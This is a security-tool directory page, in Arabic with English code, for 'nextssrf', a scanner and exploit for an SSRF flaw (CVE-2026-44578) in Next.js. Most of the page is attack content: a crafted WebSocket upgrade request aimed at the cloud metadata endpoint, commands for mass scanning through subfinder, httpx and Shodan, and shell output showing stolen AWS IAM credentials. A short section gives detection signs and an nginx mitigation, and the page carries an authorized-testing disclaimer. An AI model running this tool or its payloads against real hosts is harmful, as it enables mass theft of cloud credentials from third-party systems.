Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ynsmroztas/nextssrf
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن السحابة
GitHubynsmroztas/nextssrf

nextssrf

أداة فحص واستغلال لثغرة CVE-2026-44578 الخاصة بـ SSRF في معالج ترقية WebSocket في Next.js. تكتشف الإصدارات المعرضة للخطر، وتستخرج بيانات تعريف السحابة، وتسرّب بيانات اعتماد IAM عبر قشرة تفاعلية.

عرض المستودع
7620منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Python CVE CVSS License Platform

CVE-2026-44578 — تزوير الطلبات من جانب الخادم (SSRF) عبر معالج ترقية WebSocket في Next.js

نظرة عامة · التثبيت · الاستخدام · خط الأنابيب · Shodan · الصدفة التفاعلية · إخلاء المسؤولية


نظرة عامة

في 11 مايو 2026، أصدرت Vercel تصحيحًا لثغرة CVE-2026-44578 (بدرجة CVSS 8.6): وهي ثغرة SSRF غير مصادق عليها في معالج ترقية WebSocket الخاص بإطار العمل Next.js، تؤثر على جميع النشرات ذاتية الاستضافة بدءًا من الإصدار 13.4.13 فما بعد.

آلية الاستغلال

root@kitploit:~
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1   ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==

إن // في http:// تؤدي إلى خروج مبكر من دالة normalizeRepeatedSlashes، مع تعيين statusCode: 308 و finished: true. معالج الترقية المتأثر يتجاهل كلتا العلامتين ويستدعي proxyRequest عندما تكون قيمة parsedUrl.protocol صادقة (truthy) — ليتم توجيه الطلب إلى المضيف الذي يتحكم فيه المهاجم عبر المنفذ 80.

root@kitploit:~
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
-     return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+     if (!statusCode) {
+         return await proxyRequest(req, socket, parsedUrl, head)

الإصدارات المتأثرة

المنتجالإصدارات المتأثرةالإصدار المُصحَّح
Next.js13.4.13 – 15.5.1515.5.16
Next.js16.0.0 – 16.2.416.2.5
الاستضافة عبر Vercel✅ غير متأثرةN/A

القيود

  • طلبات GET فقط (لا POST/PUT)
  • المنفذ 80 فقط (تتم إزالة المنافذ الصريحة عبر تطبيع URL)
  • IMDSv2 في AWS غير قابلة للاستغلال (تتطلب رمز PUT)
  • البيانات الوصفية لـ GCP ترفض Upgrade: websocket برمز 400
  • الوكلاء العكسيون (nginx/caddy/HAProxy) يحظرون URIs بالصيغة المطلقة (absolute-form)

العرض التوضيحي

NextSSRF — تسريب بيانات اعتماد AWS

تسريب بيانات اعتماد AWS IMDSv1 عبر CVE-2026-44578 — صدفة استغلال تفاعلية


التثبيت

root@kitploit:~
git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com

بدون أي تبعيات — مكتبة Python القياسية فقط. يتطلب Python 3.10+.


الاستخدام

فحص هدف واحد

root@kitploit:~
python3 nextssrf.py -t https://target.com

استهداف سحابة محددة

root@kitploit:~
# AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws

# Custom internal target
python3 nextssrf.py -t https://target.com \
  --ssrf-host http://internal-api --path /admin

# Deep scan (+ internal services)
python3 nextssrf.py -t https://target.com --cloud aws --deep

الفحص الجماعي (خط أنابيب)

root@kitploit:~
# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl

# File input
python3 nextssrf.py -f targets.txt --threads 15 -o results.json

# Force scan (even if version unknown)
python3 nextssrf.py -t https://target.com --force

رموز الخروج

الرمزالمعنى
0غير متأثرة / نظيف
1متأثرة (بدون استغلال)
2تم تأكيد SSRF

الصدفة التفاعلية

صدفة استغلال متقدمة مع كشف تلقائي للبيئة السحابية واستخراج بيانات اعتماد IAM:

root@kitploit:~
python3 nextssrf.py -t https://target.com
root@kitploit:~
╔══════════════════════════════════════════════════╗
║  NextSSRF v2 — Interactive Exploit Shell         ║
║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║
║  CVE    : CVE-2026-44578  |  Status: Connected   ║
╚══════════════════════════════════════════════════╝

nextssrf(ec2-x...)> cloud
  [>] Detecting cloud provider...
  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
  → Run 'aws' for full credential extraction

nextssrf(ec2-x...)> aws
  [1/3] Instance Information
  [200] Hostname    : ip-172-31-47-134.ec2.internal
  [200] AZ          : us-east-1d
  [200] Account ID  : {"AccountId": "370741706736"}

  [2/3] IAM Role Discovery
  ✓ IAM Role found: my-ec2-role

  [3/3] Credential Extraction
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  🎯 AWS CREDENTIALS EXFILTRATED!
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Expiration  : 2026-05-14T22:32:22Z

أوامر الصدفة

الوضع التلقائي

root@kitploit:~
# Detect cloud + run full exploit chain automatically
python3 nextssrf.py -t https://target.com --auto

أمثلة على خط الأنابيب

root@kitploit:~
# Full recon → exploit pipeline
subfinder -d target.com \
  | httpx -silent -server \
  | grep -i "next" \
  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl

# Shodan mass scan → interactive on confirmed hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl

# Check specific version range
cat hosts.txt \
  | python3 nextssrf.py --pipe --force --cloud aws \
  | jq '.[] | select(.ssrf_hits | length > 0)'

كشف الهجوم (الفريق الأزرق)

علامات الاستغلال في السجلات:

root@kitploit:~
# Next.js process logs
Failed to proxy http:/   ← single slash = normalization fingerprint

# Access logs (absolute-form URI + Upgrade header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket

التخفيف (إذا تعذّر التحديث)

root@kitploit:~
# Nginx: reject absolute-form request URIs
if ($request_uri ~* "^https?://") {
    return 400;
}

المراجع

  • GHSA-c4j6-fc7j-m34r
  • NVD CVE-2026-44578
  • الإصدار الأمني لـ Next.js — مايو 2026
  • التحليل الفني من Hadrian

إخلاء المسؤولية

للاستخدام في الاختبارات الأمنية المصرّح بها وأبحاث مكافآت الثغرات فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. المؤلفون غير مسؤولين عن سوء الاستخدام أو الاستخدام غير المصرّح به. التزم دائمًا بقواعد الاشتباك (Rules of Engagement) الخاصة ببرنامج مكافآت الثغرات.


أُنشئ بكل ❤️ بواسطة @mitsec · ynsmroztas.github.io

أفضل هاكر على Intigriti · أكثر من 100 إدراج في قاعة المشاهير · أكثر من 2430 ثغرة · أكثر من 1100 ثغرة حرجة P1

تنزيل الأداة
الأمرالوصف
cloudكشف تلقائي للبيئة السحابية (AWS/Azure/GCP/DO/OCI)
awsسلسلة كاملة لبيانات اعتماد IAM في AWS
azureرمز الهوية المُدارة في Azure
scanكشف البيئة السحابية + استغلال تلقائي
url <http://>طلب SSRF مخصص
get <N>استهداف AWS IMDS عبر الفهرس
listعرض جميع نقاط نهاية IMDS
historyسجل الطلبات
saveتصدير الجلسة إلى JSON
quitخروج